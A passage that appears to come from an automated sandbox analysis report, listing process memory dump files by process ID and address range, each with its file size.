                                                                                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                                                                                • memory/428-632-0x00000164DD8D0000-0x00000164DD8FB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                                                                                                • memory/428-638-0x00000164DD8D0000-0x00000164DD8FB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                                                                                                • memory/616-643-0x00000214D9FB0000-0x00000214D9FDB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                                                                                                • memory/640-599-0x0000020989030000-0x000002098905B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                                                                                                • memory/640-605-0x0000020989030000-0x000002098905B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                                                                                                • memory/640-606-0x00007FFAE0030000-0x00007FFAE0040000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                                                                                • memory/640-597-0x0000020989000000-0x0000020989025000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  148KB

                                                                                                                                                                                                                                                                                                                                                • memory/640-598-0x0000020989030000-0x000002098905B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                                                                                                • memory/700-617-0x00007FFAE0030000-0x00007FFAE0040000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                                                                                • memory/700-616-0x000001E5DED40000-0x000001E5DED6B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                                                                                                • memory/700-610-0x000001E5DED40000-0x000001E5DED6B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                                                                                                • memory/1000-628-0x00007FFAE0030000-0x00007FFAE0040000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                                                                                • memory/1000-621-0x000002086EFC0000-0x000002086EFEB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                                                                                                • memory/1000-627-0x000002086EFC0000-0x000002086EFEB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                                                                                                • memory/4608-1476-0x000000001CD40000-0x000000001CD4C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  48KB

                                                                                                                                                                                                                                                                                                                                                • memory/4608-465-0x0000000000E50000-0x0000000000E62000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  72KB

                                                                                                                                                                                                                                                                                                                                                • memory/4608-1569-0x0000000020590000-0x0000000020AB8000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  5.2MB

                                                                                                                                                                                                                                                                                                                                                • memory/4608-1568-0x000000001CD50000-0x000000001CE00000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  704KB

                                                                                                                                                                                                                                                                                                                                                • memory/6656-561-0x0000000000D70000-0x0000000000D76000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  24KB

                                                                                                                                                                                                                                                                                                                                                • memory/6656-548-0x0000000000620000-0x0000000000666000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  280KB

                                                                                                                                                                                                                                                                                                                                                • memory/6656-1785-0x0000000001030000-0x000000000104E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                • memory/6656-1775-0x0000000001000000-0x0000000001010000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                                                                                • memory/6656-1473-0x000000001C780000-0x000000001C7F6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  472KB

                                                                                                                                                                                                                                                                                                                                                • memory/6964-576-0x000002025A9F0000-0x000002025AA12000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                                                                                                • memory/6964-579-0x00007FFB1F0E0000-0x00007FFB1F19D000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  756KB

                                                                                                                                                                                                                                                                                                                                                • memory/6964-578-0x00007FFB1FFA0000-0x00007FFB201A9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  2.0MB

                                                                                                                                                                                                                                                                                                                                                • memory/6964-577-0x000002025ADA0000-0x000002025ADCA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  168KB

                                                                                                                                                                                                                                                                                                                                                • memory/7108-477-0x0000000000A90000-0x0000000000AA6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  88KB

                                                                                                                                                                                                                                                                                                                                                • memory/7456-591-0x00007FFB1F0E0000-0x00007FFB1F19D000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  756KB

                                                                                                                                                                                                                                                                                                                                                • memory/7456-587-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                                                                                                • memory/7456-594-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                                                                                                • memory/7456-590-0x00007FFB1FFA0000-0x00007FFB201A9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  2.0MB

                                                                                                                                                                                                                                                                                                                                                • memory/7456-584-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                                                                                                • memory/7456-589-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                                                                                                • memory/7456-585-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                                                                                                • memory/7456-586-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                                                                                                • memory/9052-355-0x00000000008B0000-0x0000000001B50000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  18.6MB

                                                                                                                                                                                                                                                                                                                                                • memory/9052-354-0x00000000748FE000-0x00000000748FF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB